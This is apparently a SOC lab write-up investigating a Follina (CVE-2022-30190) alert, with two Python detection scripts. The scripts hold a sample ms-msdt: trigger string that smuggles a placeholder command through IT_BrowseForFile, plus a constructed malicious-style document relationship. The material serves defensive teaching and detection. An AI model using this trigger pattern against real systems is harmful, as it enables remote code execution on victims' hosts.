
CVE-2022-30190 PoC — Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability

Associated Vulnerability
Title: Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability (CVE-2022-30190)
Description: A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights. Please see the MSRC Blog Entry for important information about steps you can take to protect your system from this vulnerability.
Readme
# LetsDefend-SOC173-Follina-0-Day-Detected
We are presented with a security alert indicating the detection of the Follina (CVE-2022-30190) vulnerability. A malicious Word document triggered msdt.exe execution, suggesting possible remote code execution on the host JonasPRD. Our task is to investigate the alert, confirm exploitation, assess impact, and recommend remediation.



## Case details

<br />
<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/3016fe04-0df7-4f3b-af1f-71f64bb0eaac" />

<br />
<br />

At 15:22 on 2 June 2022 an alert fired from the **SOC173 - Follina 0-Day Detected** SIEM rule for the endpoint 'JonasPRD' (172.16.17.39): msdt.exe had been executed immediately after an Office document was opened on the host. The alert included the file's hash and recorded the antivirus action as "allowed", meaning the document was neither blocked nor quarantined, so whatever it carried had the chance to run.

Follina (CVE-2022-30190) is a vulnerability in the Microsoft Support Diagnostic Tool (MSDT). A crafted Office document carries an external OLE object relationship that points at an attacker-controlled HTML page; when Word retrieves that page, the page invokes the ms-msdt: URL protocol handler, which launches msdt.exe with a troubleshooter parameter string into which the attacker has embedded a PowerShell command. No macros are involved, so no macro warning is shown, and the command runs with the privileges of the user who opened the document; the RTF variant can fire from the Windows Explorer preview pane without the file ever being opened. From there the attacker can run programs, download additional malware, or exfiltrate data. Typical indicators are msdt.exe spawned by an Office application (WINWORD.EXE, EXCEL.EXE and so on) with ms-msdt: in its command line, msdt's diagnostic host sdiagnhost.exe launching a console or shell, unexpected outbound connections shortly after a document was opened, and new files or services appearing on the host. Apply the June 2022 security update; until a host is patched, Microsoft's published workaround was to export and then delete the HKEY_CLASSES_ROOT\ms-msdt registry key so the protocol handler no longer resolves. Disable the Explorer preview pane where practical, treat unsolicited Office attachments with suspicion, and hunt for the document hash and msdt.exe activity across the estate.
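The two artefacts a triage analyst can inspect before msdt.exe ever runs are the document's relationship file and the remote HTML page it points at. The script below is an added example written for this write-up, not code from the original case: it unpacks a .docx and reports any external oleObject relationship, then extracts and classifies any ms-msdt: URI from a page body. The sample document and HTML are constructed inline (the URL and the 'calc.exe' placeholder command are assumptions, not indicators from the case), so nothing is fetched from the network.

```python
"""Triage a Word document for the Follina (CVE-2022-30190) carrier pattern.

Added example for this write-up, not code from the original case. It checks the
two places a Follina chain is visible before msdt.exe ever runs:
  1. word/_rels/document.xml.rels inside the .docx, for an oleObject relationship
     with TargetMode="External" (the in-the-wild samples pointed this at a remote
     HTML page; their Target ended in "!").
  2. The body of that HTML page, for the ms-msdt: URI that names the
     PCWDiagnostic troubleshooter and smuggles a command via IT_BrowseForFile.
The .docx and HTML below are constructed for the example; nothing is fetched.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
STYLES_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"

# ms-msdt:... up to the first unescaped double quote, newline or tag; the page's
# JavaScript wraps the URI in a quoted string with backslash-escaped inner quotes.
MSDT_URI_RE = re.compile(r'ms-msdt:(?:\\.|[^"\r\n<])*', re.IGNORECASE)


def external_ole_targets(docx_bytes: bytes) -> List[str]:
    """Return targets of external oleObject relationships in every word/_rels/*.rels."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/_rels/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("Type") == OLE_REL and rel.get("TargetMode") == "External":
                    hits.append(rel.get("Target"))
    return hits


def msdt_uris(html: str) -> List[str]:
    """Extract every ms-msdt: URI from a retrieved HTML page body."""
    return MSDT_URI_RE.findall(html)


def is_follina_trigger(uri: str) -> bool:
    """True when the URI targets the PCWDiagnostic pack and supplies IT_BrowseForFile,
    the parameter the published Follina samples used to inject a command."""
    u = uri.lower()
    return u.startswith("ms-msdt:") and "pcwdiagnostic" in u and "it_browseforfile=" in u


def build_sample_docx(external_target: Optional[str]) -> bytes:
    """Constructed minimal .docx: with a target it carries the Follina-style external
    oleObject relationship, with None it is a clean document of the same shape."""
    rels = ['<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
            '<Relationships xmlns="%s">' % RELS_NS,
            '<Relationship Id="rId1" Type="%s" Target="styles.xml"/>' % STYLES_REL]
    if external_target is not None:
        rels.append('<Relationship Id="rId996" Type="%s" Target="%s" TargetMode="External"/>'
                    % (OLE_REL, external_target))
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                   "<w:body/></w:document>")
        z.writestr("word/_rels/document.xml.rels", "".join(rels))
    return buf.getvalue()


# Constructed stand-in for the remote page; the command is a harmless placeholder.
SAMPLE_HTML = (
    "<!doctype html><html><body><script>\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu '
    "IT_BrowseForFile=$(Invoke-Expression('calc.exe'))\\\"\";\n"
    "</script></body></html>"
)

if __name__ == "__main__":
    doc = build_sample_docx("https://example.invalid/lure.html!")  # hypothetical URL
    for target in external_ole_targets(doc):
        print("external oleObject target:", target)
    for uri in msdt_uris(SAMPLE_HTML):
        print("ms-msdt URI:", uri, "| follina-style:", is_follina_trigger(uri))
```

An external oleObject target on its own is not proof of Follina (legitimate documents can link external objects), which is why the second check looks at the page body the target resolves to; in a real triage, retrieve that page from a sandboxed host, never from the analyst workstation.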


## VirusTotal, OTX AlienVault & MalwareBazaar

To begin my investigation, I used VirusTotal to analyse the file hash. The results showed that 47 out of 67 vendors identified the file as malicious, with several reports linking it to CVE-2022-30190.

<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/bf05e888-b266-403e-bb86-c83f3c281fdb" />

Additionally, OTX assigns the file a high risk score of 9.2, categorising it as malicious.

<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/0a2ad72e-0ec0-456b-ae99-dfd8e72dfaec" />

A search on MalwareBazaar confirms that this file is present in their malware repository. Notably, the tags indicate it is associated with CVE-2022-30190, follina, maldoc, and msdt.exe.

<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/32940cae-0bf9-4a60-b7bd-c73fb09441e5" />
<br />
<br />

Correlating the hash across VirusTotal, OTX and MalwareBazaar confirms that it belongs to a known malicious document weaponised for CVE-2022-30190, so the alert is not a false positive on the file itself.

## Log Analysis

Filtering the logs on the affected endpoint's IP address (172.16.17.39) returned seven entries within the incident's timeframe. Six of them are outbound requests to the flagged domain www[.]xmlformats[.]com, which is consistent with Word retrieving the remote HTML page referenced by the document, the step that delivers the ms-msdt: URI to the host.

<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/ed9f1339-3af9-422b-90af-07217b456f96" />
<br />
<br />

Resolving the traffic to its destination IP address (141.105.65.149) confirmed that the connection to that host was actually established.



<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/6e214016-590c-4aaa-b922-aa8064a34eb9" />


## Email Security

To validate my findings, I also examined the email received by the host. It contained a malicious document, clearly crafted as part of a phishing attempt. I took immediate action to mitigate the threat by removing it from the endpoint.



<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/3377ad45-7f03-4722-8b72-3ad089963d13" />


## Endpoint Security

Reviewing the endpoint showed the msdt.exe process present on the host, matching the alert's description of the activity. Given the evidence gathered so far, I contained the device to stop any further damage and escalated the case to Level 2 for deeper analysis.
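Finding msdt.exe in the process list is the endpoint-side confirmation of the alert, and the same logic can be run across process-creation telemetry for every host to find other victims. The script below is an added example written for this write-up, not code or telemetry from the case: it applies three rules (an Office application spawning msdt.exe, an ms-msdt: URI on msdt's command line, and sdiagnhost.exe spawning a console or shell) to constructed Sysmon Event ID 1-style records, then walks each hit's lineage back to the application that opened the document. The records, PIDs, the user path and the placeholder command are all constructed; the field names are simplified from Sysmon's.

```python
"""Hunt for the Follina process chain in process-creation telemetry.

Added example for this write-up, not code or data from the original case. It
encodes the Follina indicators as three rules over Sysmon Event ID 1-style
records: an Office application spawning msdt.exe, msdt.exe carrying an ms-msdt:
URI on its command line, and msdt's diagnostic host (sdiagnhost.exe, which runs
the troubleshooter's PowerShell in-process) spawning a console or shell. A lineage
walk then ties any hit back to the document-opening application. The records below
are constructed; field names are simplified from Sysmon's.
"""
import ntpath
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"conhost.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}

# Constructed process-creation records for the host in this case (not real telemetry).
SAMPLE_EVENTS = [
    {"utc_time": "2022-06-02 15:21:40", "pid": 4120, "ppid": 1880,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\jonas\Downloads\attachment.docx"'},
    {"utc_time": "2022-06-02 15:21:58", "pid": 5012, "ppid": 4120,
     "image": r"C:\Windows\System32\msdt.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "C:\\Windows\\system32\\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "
                     "\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu "
                     "IT_BrowseForFile=$(Invoke-Expression('calc.exe'))\""},  # placeholder command
    {"utc_time": "2022-06-02 15:21:59", "pid": 5200, "ppid": 5012,
     "image": r"C:\Windows\System32\sdiagnhost.exe",
     "parent_image": r"C:\Windows\System32\msdt.exe",
     "command_line": r"C:\Windows\System32\sdiagnhost.exe -Embedding"},
    {"utc_time": "2022-06-02 15:22:01", "pid": 5300, "ppid": 5200,
     "image": r"C:\Windows\System32\conhost.exe",
     "parent_image": r"C:\Windows\System32\sdiagnhost.exe",
     "command_line": r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    # Benign: a user launching a built-in network troubleshooter from the shell.
    {"utc_time": "2022-06-02 15:30:12", "pid": 6100, "ppid": 1880,
     "image": r"C:\Windows\System32\msdt.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"C:\Windows\system32\msdt.exe -id NetworkDiagnosticsNetworkAdapter"},
]


def _base(path: str) -> str:
    """Lower-cased image file name, so rules match regardless of install path or case."""
    return ntpath.basename(path).lower()


def detect(events: List[Dict]) -> List[Dict]:
    """Apply the three Follina rules; return one finding per (pid, rule)."""
    findings = []
    for e in events:
        image, parent = _base(e["image"]), _base(e["parent_image"])
        cmd = e["command_line"].lower()
        if image == "msdt.exe" and parent in OFFICE_APPS:
            findings.append({"pid": e["pid"], "rule": "office_spawned_msdt"})
        if image == "msdt.exe" and ("ms-msdt:" in cmd or "it_browseforfile=" in cmd):
            findings.append({"pid": e["pid"], "rule": "msdt_uri_on_commandline"})
        if parent == "sdiagnhost.exe" and image in SHELLS:
            findings.append({"pid": e["pid"], "rule": "sdiagnhost_spawned_shell"})
    return findings


def lineage(events: List[Dict], pid: int) -> List[str]:
    """Image basenames from pid up through every parent present in the events, ending
    with the recorded parent image of the oldest ancestor we hold a record for.
    Keys on pid alone, so it assumes no PID reuse inside the window examined."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    cur = by_pid[pid]
    while True:
        chain.append(_base(cur["image"]))
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            chain.append(_base(cur["parent_image"]))
            return chain
        cur = parent


def document_rooted(events: List[Dict], pid: int) -> bool:
    """True when an Office application sits anywhere above pid in the process tree."""
    return any(name in OFFICE_APPS for name in lineage(events, pid))


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["rule"], "pid", f["pid"], "lineage:",
              " <- ".join(lineage(SAMPLE_EVENTS, f["pid"])))
```

The benign troubleshooter launch at the end of the sample is there deliberately: msdt.exe by itself is a normal Windows binary, and a hunt that alerts on every msdt.exe process will drown in noise, so the rules key on the parent, the ms-msdt: URI, and what the diagnostic host goes on to spawn.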



<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/f9bae79e-e459-49af-9075-070568570c9f" />


## Conclusion 

The evidence confirms a compromise via CVE-2022-30190 (Follina) delivered as a phishing attachment. The user opened the malicious Word document; the logs show connections from the host to the flagged domain www[.]xmlformats[.]com (141.105.65.149) that the document references, and msdt.exe executed on the device, indicating that the attacker's command ran. The endpoint has been contained and the incident escalated to a Tier 2 SOC analyst for deeper analysis to protect the organisation.



<img width="800" height="800" alt="Image" src="https://github.com/user-attachments/assets/4b4a6996-8dce-4b85-b6b4-56dc9b50a924" />
<br />
<br />

Thank you for reading!